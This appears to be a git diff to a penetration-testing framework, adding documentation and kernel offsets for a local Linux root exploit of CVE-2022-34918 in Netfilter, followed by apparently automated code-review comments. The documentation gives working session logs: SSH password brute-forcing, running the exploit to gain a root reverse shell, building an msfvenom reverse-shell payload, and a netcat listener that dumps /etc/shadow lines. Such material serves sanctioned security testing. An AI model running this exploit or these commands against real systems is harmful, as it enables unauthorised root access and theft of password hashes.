diff --git a/data/exploits/CVE-2022-34918/ubuntu.elf b/data/exploits/CVE-2022-34918/ubuntu.elf index f80983a21e..88a70b5550 100755 Binary files a/data/exploits/CVE-2022-34918/ubuntu.elf and b/data/exploits/CVE-2022-34918/ubuntu.elf differ diff --git a/documentation/modules/exploit/linux/local/netfilter_nft_set_elem_init_privesc.md b/documentation/modules/exploit/linux/local/netfilter_nft_set_elem_init_privesc.md new file mode 100644 index 0000000000..9bf2e81125 --- /dev/null +++ b/documentation/modules/exploit/linux/local/netfilter_nft_set_elem_init_privesc.md 
@@ -0,0 +1,149 @@ +## Vulnerable Application + +This module exploits a vulnerability in Netfilter, the Linux Kernel component +that implements firewall capabilities in Linux. +The vulnerability is a type-confusion bug that leads to a heap overflow in kernel memory. +The exploit relies on spraying, it may fail, or crash the target system. + +### Install + +The vulnerability exists in linux kernel versions from `5.8-rc1` up to `v5.19-rc5`. +this module contains offsets for some vulnerable Ubuntu versions. + +Install Ubuntu 22.04 LTS with a vulnerable kernel version. +`apt-get install linux-image-5.15.0-25-generic` +Hold shift when you reboot and select the proper kernel version + +## Verification Steps + +1. Make an Ubuntu target. +1. Create a Meterpreter or shell payload and upload it to the Ubuntu target. Or setup openssh-server, and use the corresponding auxiliary module. +1. Get a session +1. Do: `use exploit/linux/local/netfilter_nft_set_elem_init_privesc` +1. Do: `set session ` +1. Do: `set payload ` +1. Do: `set lhost ` +1. Do: `set [r|l]port ` +1. Do: `run` +1. You should get a new session as the `root` user. +1. If it fails, retry, or reboot Ubuntu and retry. + +## Options + +### COMPILE + +[Auto|True|False] This selects the binary to use. `True` will cause the module to upload the source +code and perform compilation on target, `False` will cause the module to upload a precompiled binary. +`Auto` will cause the module to try compiling the exploit on the target but will fall back to the +precompiled option if a compiler cannot be found. + +### WritableDir + +This indicates the location where you would like the payload and exploit binary stored. +The default value is `/tmp` + +Due to the exploitation strategy that this module relies on, `/tmp` must be writable, even if +`WritableDir` is a different directory. `modprobe_path` gets overwritten with a path to a file +in `/tmp`. 
This file is a bash script that adds the setuid bit to the payload uploaded at +`WritableDir`. + +## Scenarios + +### Ubuntu 21.10 x64 With Linux 5.13.0.37-Generic + +``` +msf6 > use auxiliary/scanner/ssh/ssh_login +msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.40 +rhosts => 192.168.0.40 +msf6 auxiliary(scanner/ssh/ssh_login) > set username redouane +username => redouane +msf6 auxiliary(scanner/ssh/ssh_login) > set password user +password => user +msf6 auxiliary(scanner/ssh/ssh_login) > run + +[*] 192.168.0.40:22 - Starting bruteforce +[+] 192.168.0.40:22 - Success: 'redouane:user' 'uid=1000(redouane) gid=1000(redouane) groupes=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux hopeful-zhukovky 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux ' +[*] SSH session 1 opened (192.168.0.32:46499 -> 192.168.0.40:22) at 2022-07-22 02:44:56 +0200 +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/netfilter_nft_set_elem_init_privesc +[*] Using configured payload linux/x64/shell_reverse_tcp +msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set lhost wlan0 +lhost => wlan0 +msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 1 +session => 1 +msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run + +[!] SESSION may not be compatible with this module: +[!] * incompatible session architecture: +[*] Started reverse TCP handler on 192.168.0.32:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[*] Dropping pre-compiled binaries to system... +[*] Writing '/tmp/z9G2XJ' (761240 bytes) ... +[*] Uploading payload... +[*] Writing '/tmp/AsfKz' (248 bytes) ... +[*] Running payload on remote system... 
+[+] Deleted /tmp/z9G2XJ +[+] Deleted /tmp/AsfKz +[*] Command shell session 2 opened (192.168.0.32:4444 -> 192.168.0.40:35956) at 2022-07-22 02:45:54 +0200 + +id +[*] Payload executed! If it was successful, a session should have been created + +uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane) +``` + +## Notes + +### Included Binaries +The binary used by this exploit `data/exploits/CVE-2022-34918/ubuntu.elf` can be used separately from +Metasploit. The binary takes a single argument which is the payload or executable you wish to launch as `root`. + +The exploit adds the setuid bit to the payload, the path given must be absolute, avoid binaries that don't run +when the setuid bit is detected. + +Also, the exploit process forks, gets its child to execute the setuid payload binary, and exits +(it doesn't call `wait` or `waitpid`). For this reason, don't expect the binary to read input from standard input. + +The following snippet shows an example of how one might run a payload to get +a new Bash shell as the `root` user. 
+ +``` +redouane@wizardly-maxwell:~$ id +uid=1000(redouane) gid=1000(redouane) groups=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) +redouane@wizardly-maxwell:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 PrependSetresuid=true PrependSetresgid=true -f elf -o payload +[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload +[-] No arch selected, selecting arch: x64 from the payload +No encoder specified, outputting raw payload +Payload size: 96 bytes +Final size of elf file: 216 bytes +Saved as: payload +redouane@wizardly-maxwell:~$ chmod +x payload +redouane@wizardly-maxwell:~$ (echo id; head -n 2 /etc/shadow) | nc -lvvp1337 & +[1] 2272 +redouane@wizardly-maxwell:~$ Listening on 0.0.0.0 1337 + +redouane@wizardly-maxwell:~$ ./ubuntu.elf /home/redouane/payload +[+] kernel version '5.15.0-25-generic #25-Ubuntu' detected +[+] Second process currently waiting +[+] Get CAP_NET_ADMIN capability +[+] Netlink socket created +[+] Netlink socket bound +[+] Table table created +[+] Set for the leak created +[+] Set for write primitive created +[*] Leak in process +[+] Leak succeed +[+] kaslr base found 0xffffffff9f000000 +[+] physmap base found 0xffff910a00000000 +[+] modprobe path changed ! +[+] Modprobe payload setup +[?] waitpid +[?] sem_post +[+++] Got root shell, should exit? +Connection received on localhost 56962 +uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane) +root:!:19193:0:99999:7::: +daemon:*:19101:0:99999:7::: +``` diff --git a/external/source/exploits/CVE-2022-34918/Makefile b/external/source/exploits/CVE-2022-34918/Makefile index 79e2f3ecb3..ca507bde95 100644 --- a/external/source/exploits/CVE-2022-34918/Makefile +++ b/external/source/exploits/CVE-2022-34918/Makefile @@ -26,5 +26,5 @@ obj: mkdir obj clean: - rm -rf obj/*.o + rm -rf obj rm -f $(TARGET) 
diff --git a/external/source/exploits/CVE-2022-34918/src/util.c b/external/source/exploits/CVE-2022-34918/src/util.c index c64a998454..e1f7c1257a 100644 --- a/external/source/exploits/CVE-2022-34918/src/util.c +++ b/external/source/exploits/CVE-2022-34918/src/util.c @@ -13,9 +13,24 @@ struct kernel_info kernels[] = { // 22.04 LTS - { "5.15.0-39-generic #42-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 }, - { "5.15.0-40-generic #43-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 }, - { "5.15.0-25-generic #25-Ubuntu", 0x3dda20, 0x3de520, 0x1e8b3a0 }, + { "5.15.0-24-lowlatency #24-Ubuntu", 0x3e68a0, 0x3e7690, 0x1e8c320 }, + { "5.15.0-25-generic #25-Ubuntu", 0x3dda20, 0x3de520, 0x1e8b3a0 }, + { "5.15.0-27-generic #28-Ubuntu", 0x3ddaf0, 0x3de5f0, 0x1e8b320 }, + { "5.15.0-27-lowlatency #28-Ubuntu", 0x3e6970, 0x3e7760, 0x1e8c2a0 }, + { "5.15.0-30-generic #31-Ubuntu", 0x3dea40, 0x3df540, 0x1e8b460 }, + { "5.15.0-30-lowlatency #31-Ubuntu", 0x3e78b0, 0x3e86a0, 0x1e8c3e0 }, + { "5.15.0-33-generic #34-Ubuntu", 0x3dea40, 0x3df540, 0x1e8b460 }, + { "5.15.0-33-lowlatency #34-Ubuntu", 0x3e78c0, 0x3e86b0, 0x1e8c3e0 }, + { "5.15.0-35-generic #36-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b560 }, + { "5.15.0-35-lowlatency #36-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c4e0 }, + { "5.15.0-37-generic #39-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b560 }, + { "5.15.0-37-lowlatency #39-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c4e0 }, + { "5.15.0-39-generic #42-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 }, + { "5.15.0-39-lowlatency #42-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c5a0 }, + { "5.15.0-40-generic #43-Ubuntu", 0x3dfa00, 0x3e04f0, 0x1e8b620 }, + { "5.15.0-40-lowlatency #43-Ubuntu", 0x3e88d0, 0x3e96b0, 0x1e8c5a0 }, + { "5.15.0-41-generic #44-Ubuntu", 0x3e00a0, 0x3e0b90, 0x1e8b660 }, + { "5.15.0-41-lowlatency #44-Ubuntu", 0x3e8f70, 0x3e9d50, 0x1e8c5e0 }, // Ubuntu 20.04.4 LTS { "5.11.0-41-generic #45~20.04.1-Ubuntu", 0x37db60, 0x389a80, 0x1c6c2e0 }, { "5.11.0-44-generic #48~20.04.2-Ubuntu", 0x37de70, 0x389a90, 0x1c6c2e0 }, 
diff --git a/modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb b/modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb index 5ec057247c..1381f30764 100644 --- a/modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb +++ b/modules/exploits/linux/local/netfilter_nft_set_elem_init_privesc.rb @@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local def run_payload info = cmd_exec(@executable_path, @payload_path) info.each_line do |line| - print_status(line) + print_status(line.chomp) end print_status('Payload executed! If it was successful, a session should have been created') end 
@@ -106,35 +106,18 @@ class MetasploitModule < Msf::Exploit::Local def check config = kernel_config - if config.nil? - vprint_error 'Could not retrieve kernel config' - return CheckCode::Unknown - end - unless config.include? 'CONFIG_USER_NS=y' - vprint_error 'Kernel config does not include CONFIG_USER_NS' - return CheckCode::Safe - end - vprint_good 'Kernel config has CONFIG_USER_NS enabled' + return CheckCode::Unknown('Could not retrieve kernel config') if config.nil? - unless userns_enabled? - vprint_error 'Unprivileged user namespaces are not permitted' - return CheckCode::Safe - end - vprint_good 'Unprivileged user namespaces are permitted' + return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y') - if lkrg_installed? - vprint_error 'LKRG is installed' - return CheckCode::Safe - end - vprint_good 'LKRG is not installed' + return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled? + + return CheckCode::Safe('LKRG is installed') if lkrg_installed? arch = kernel_hardware - unless arch.include? 'x86_64' - vprint_error "System architecture #{arch} is not supported" - return CheckCode::Safe - end - vprint_good "System architecture #{arch} is supported" + + return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64') release = kernel_release version = "#{release} #{kernel_version.split(' ').first}"
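Review bot: in the new documentation file, the Scenarios heading reads `### Ubuntu 21.10 x64 With Linux 5.13.0.37-Generic`, but the ssh_login output and the exploit's banner in that same section show `5.15.0-25-generic #25-Ubuntu`, which is the Ubuntu 22.04 kernel the Install section tells the reader to install; rename the heading to match the captured session so a user does not assume 5.13 kernels are covered by the `util.c` table. Smaller points in the same file: `this module contains offsets` starts a sentence in lower case; the Verification Steps leave the values after `set session`, `set payload`, `set lhost` and `set [r|l]port` empty, so placeholders such as `<session id>` would make the steps usable; and the sample run prints `[!] * incompatible session architecture:` with no reason text, so if that warning is expected for a session created by ssh_login a sentence saying so would save a support question.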
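Review bot: changing `clean` from `rm -rf obj/*.o` to `rm -rf obj` is consistent with the `obj:` rule just above it, which recreates the directory with `mkdir obj`, so a `make clean && make` cycle still works; the one thing to confirm is that `clean` (and `obj`, since a real directory of that name now exists between builds) is listed in a `.PHONY` target elsewhere in the Makefile, otherwise a stray file named `clean` would silently satisfy the rule.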
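Review bot: the three hex columns in `struct kernel_info kernels[]` carry no comment in the visible lines saying which kernel symbols they are offsets of or how they were extracted, so none of the eighteen new 5.15.0 entries can be reviewed against the corresponding Ubuntu kernel packages without re-deriving them; add a one-line comment above the table naming the three symbols in column order and the command used to read them. Several rows share identical values (`5.15.0-35-generic #36-Ubuntu` and `5.15.0-37-generic #39-Ubuntu`; `5.15.0-39-generic #42-Ubuntu` and `5.15.0-40-generic #43-Ubuntu`; likewise their `lowlatency` siblings), which is plausible for adjacent builds but is also what a copy-paste slip looks like, so a pointer to the source is what makes those rows verifiable. The key strings do follow the `"#{release} #{kernel_version.split(' ').first}"` shape the Ruby module builds (for example `5.15.0-25-generic #25-Ubuntu`), so lookups against this table will match.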
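Review bot: `print_status(line.chomp)` is the correct fix, since `String#each_line` keeps the trailing newline on each line and `print_status` adds its own, which produced the doubled blank lines in the earlier output; no further change needed in this hunk.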
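Review bot: the `check` rewrite drops the four `vprint_good` confirmations (CONFIG_USER_NS enabled, unprivileged user namespaces permitted, LKRG absent, architecture supported), so with `verbose` set a user no longer sees which prerequisites passed before the version lookup; the `CheckCode::Safe('...')` and `CheckCode::Unknown('...')` reason strings cover the failing case well, but consider keeping one `vprint_good` that summarises the passed checks. `config.include?('CONFIG_USER_NS=y')` is a substring match over the whole config text, which is fine here because that key is unique; the guard-clause `return ... unless` style is consistent with the rest of the module.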